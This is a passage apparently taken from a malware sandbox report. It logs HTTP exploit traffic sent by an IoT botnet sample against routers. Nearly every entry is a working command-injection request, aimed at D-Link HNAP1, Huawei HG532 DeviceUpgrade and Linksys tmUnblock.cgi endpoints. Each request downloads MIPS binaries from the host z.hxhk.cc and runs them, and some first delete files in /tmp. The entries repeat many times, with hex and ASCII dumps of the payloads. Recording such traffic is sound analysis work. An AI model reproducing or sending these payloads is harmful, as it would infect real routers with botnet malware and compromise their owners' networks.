69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://z.hxhk.cc/sys64.mips && chmod +x sys64.mips;./sys64.mips hn.s`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://z.hxhk.cc/sys64.mips && chmod +x sys64.mips;./sys64.mips hn.s`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 7a 2e 68 78 68 6b 2e 63 63 20 2d 6c 20 2f 74 6d 70 2f 2e 73 79 73 36 34 20 2d 72 20 73 79 73 36 34 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 73 79 73 36 34 3b 20 2f 74 6d 70 2f 2e 73 79 73 36 34 20 68 75 77 2e 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g z.hxhk.cc -l /tmp/.sys64 -r sys64.mips; /bin/busybox chmod 777 * /tmp/.sys64; /tmp/.sys64 huw.s)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 7a 2e 68 78 68 6b 2e 63 63 20 2d 6c 20 2f 74 6d 70 2f 2e 73 79 73 36 34 20 2d 72 20 73 79 73 36 34 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 73 79 73 36 34 3b 20 2f 74 6d 70 2f 2e 73 79 73 36 34 20 68 75 77 2e 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g z.hxhk.cc -l /tmp/.sys64 -r sys64.mips; /bin/busybox chmod 777 * /tmp/.sys64; /tmp/.sys64 huw.s)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 7a 2e 68 78 68 6b 2e 63 63 20 2d 6c 20 2f 74 6d 70 2f 2e 73 79 73 36 34 20 2d 72 20 73 79 73 36 34 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 73 79 73 36 34 3b 20 2f 74 6d 70 2f 2e 73 79 73 36 34 20 68 75 77 2e 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g z.hxhk.cc -l /tmp/.sys64 -r sys64.mips; /bin/busybox chmod 777 * /tmp/.sys64; /tmp/.sys64 huw.s)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 7a 2e 68 78 68 6b 2e 63 63 20 2d 6c 20 2f 74 6d 70 2f 2e 73 79 73 36 34 20 2d 72 20 73 79 73 36 34 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 73 79 73 36 34 3b 20 2f 74 6d 70 2f 2e 73 79 73 36 34 20 68 75 77 2e 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g z.hxhk.cc -l /tmp/.sys64 -r sys64.mips; /bin/busybox chmod 777 * /tmp/.sys64; /tmp/.sys64 huw.s)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 7a 2e 68 78 68 6b 2e 63 63 20 2d 6c 20 2f 74 6d 70 2f 2e 73 79 73 36 34 20 2d 72 20 73 79 73 36 34 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 73 79 73 36 34 3b 20 2f 74 6d 70 2f 2e 73 79 73 36 34 20 68 75 77 2e 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g z.hxhk.cc -l /tmp/.sys64 -r sys64.mips; /bin/busybox chmod 777 * /tmp/.sys64; /tmp/.sys64 huw.s)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://z.hxhk.cc/sys64.mips && chmod +x sys64.mips;./sys64.mips hn.s`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 